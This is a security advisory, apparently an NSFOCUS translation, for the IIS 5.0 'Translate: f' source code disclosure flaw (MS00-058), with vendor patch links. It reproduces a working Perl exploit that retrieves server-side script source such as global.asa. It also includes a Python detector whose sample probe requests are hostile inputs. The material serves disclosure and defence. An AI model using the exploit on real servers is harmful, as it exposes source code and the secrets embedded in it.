Microsoft IIS 5.0 "Translate: f" Header Source Code Disclosure Vulnerability (MS00-058)

Published: 2000-08-14
Updated: 2000-08-14

Affected systems:
Microsoft IIS 5.0
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
    - Microsoft Windows 2000 Server
    - Microsoft Windows 2000 Professional SP2
    - Microsoft Windows 2000 Professional SP1
    - Microsoft Windows 2000 Professional
    - Microsoft Windows 2000 Datacenter Server SP2
    - Microsoft Windows 2000 Datacenter Server SP1
    - Microsoft Windows 2000 Datacenter Server
    - Microsoft Windows 2000 Advanced Server
Description:
BUGTRAQ  ID: 1578
CVE(CAN) ID: CVE-2000-0778

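IIS is a popular HTTP server developed by Microsoft and bundled with the Windows operating system.

IIS 5.0 has a vulnerability in how it handles HTTP requests that carry a certain special marker; a remote attacker may exploit it to obtain the source code of scripts on the server.

If IIS 5.0 receives an HTTP request that contains a specially formatted header (Translate: f) and whose URL ends with a special character ("/"), IIS incorrectly invokes the script processing engine, which may leak the file's source code to the remote user.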


<*Source: Daniel Docekal (ddoc@MIA.CZ)
  
  Links: http://archives.neohapsis.com/archives/ntbugtraq/2000-q3/0080.html
        http://www.ciac.org/ciac/bulletins/k-065.shtml
        http://www.microsoft.com/technet/security/bulletin/MS00-058.asp
*>

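Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

smiler@vxd.org provided the following test code: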

#!/usr/bin/perl
# Expl0it By smiler@vxd.org
# Tested with success against IIS 5.0. Maybe it works against IIS 4.0 using a shared drive but I haven't tested it yet.
# Get the source code of any script from the server using this exploit.
# This code was written after Daniel Docekal brought this issue in BugTraq.
# Cheers 351 and FractalG :)

if (not $ARGV[0]) {
print qq~
Geee it's running !! kewl :)))
Usage : srcgrab.pl <complete url of file to retrieve>
Example Usage : srcgrab.pl http://www.victimsite.com/global.asa
U can also save the retrieved file using : srcgrab.pl http://www.victim.com/default.asp > file_to_save
~; exit;}


$victimurl=$ARGV[0];

         # Create a user agent object
         use LWP::UserAgent;
         $ua = new LWP::UserAgent;

        # Create a request
        my $req = new HTTP::Request GET => $victimurl . '\\'; # Here is the backslash at the end of the url ;)
        $req->content_type('application/x-www-form-urlencoded');
        $req->content_type('text/html');
        $req->header(Translate => 'f'); # Here is the famous translate header :))
        $req->content('match=www&errors=0');

         # Pass request to the user agent and get a response back
         my $res = $ua->request($req);

         # Check the outcome of the response
         if ($res->is_success) {
             print $res->content;
         } else {
             print $res->error_as_HTML;
         }
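
An added detection example, not part of the original advisory or the test code author's work: it flags raw HTTP requests that match the pattern described above, a Translate: f header together with a script URL ending in "/" or in the backslash that the test code appends. The function names, the extension list and the sample requests are constructed for illustration.

```python
from urllib.parse import unquote

# Assumption: script types to watch; .asp and .asa are the ones named in the usage text above.
SCRIPT_EXTS = (".asp", ".asa")


def parse_request(raw):
    """Return (method, target, headers) with header names lower-cased."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)  # ValueError if malformed
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, target, headers


def is_translate_f_probe(raw):
    """True when the request combines Translate: f with a script path that ends
    in '/' or a backslash (also when that character is percent-encoded)."""
    try:
        _method, target, headers = parse_request(raw)
    except ValueError:
        return False
    # Microsoft WebDAV clients also send Translate: f, so the header alone is not flagged.
    if headers.get("translate", "").lower() != "f":
        return False
    path = unquote(target.split("?", 1)[0])
    if not path.endswith(("/", "\\")):
        return False
    return path.rstrip("/\\").lower().endswith(SCRIPT_EXTS)


# Constructed sample requests paired with the expected verdict.
SAMPLES = [
    ("GET /global.asa\\ HTTP/1.1\r\nHost: www.example.com\r\nTranslate: f\r\n\r\n", True),
    ("GET /default.asp/ HTTP/1.1\r\nHost: www.example.com\r\ntranslate: F\r\n\r\n", True),
    ("GET /default.asp%5C HTTP/1.0\r\nTranslate: f\r\n\r\n", True),
    ("GET /default.asp HTTP/1.1\r\nHost: www.example.com\r\n\r\n", False),
    ("PROPFIND /docs/ HTTP/1.1\r\nHost: www.example.com\r\nTranslate: f\r\n\r\n", False),
]

if __name__ == "__main__":
    for raw, expected in SAMPLES:
        print(is_translate_f_probe(raw), expected, repr(raw.split("\r\n", 1)[0]))
```
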

Recommendation:
Vendor patch:

Microsoft
---------
Microsoft has released a security bulletin (MS00-058) and a corresponding patch for this issue:
MS00-058:Patch Available for "Specialized Header" Vulnerability
Link: http://www.microsoft.com/technet/security/bulletin/MS00-058.asp

Patch download:

http://www.microsoft.com/Downloads/Release.asp?ReleaseID=23769

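This vulnerability entry was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.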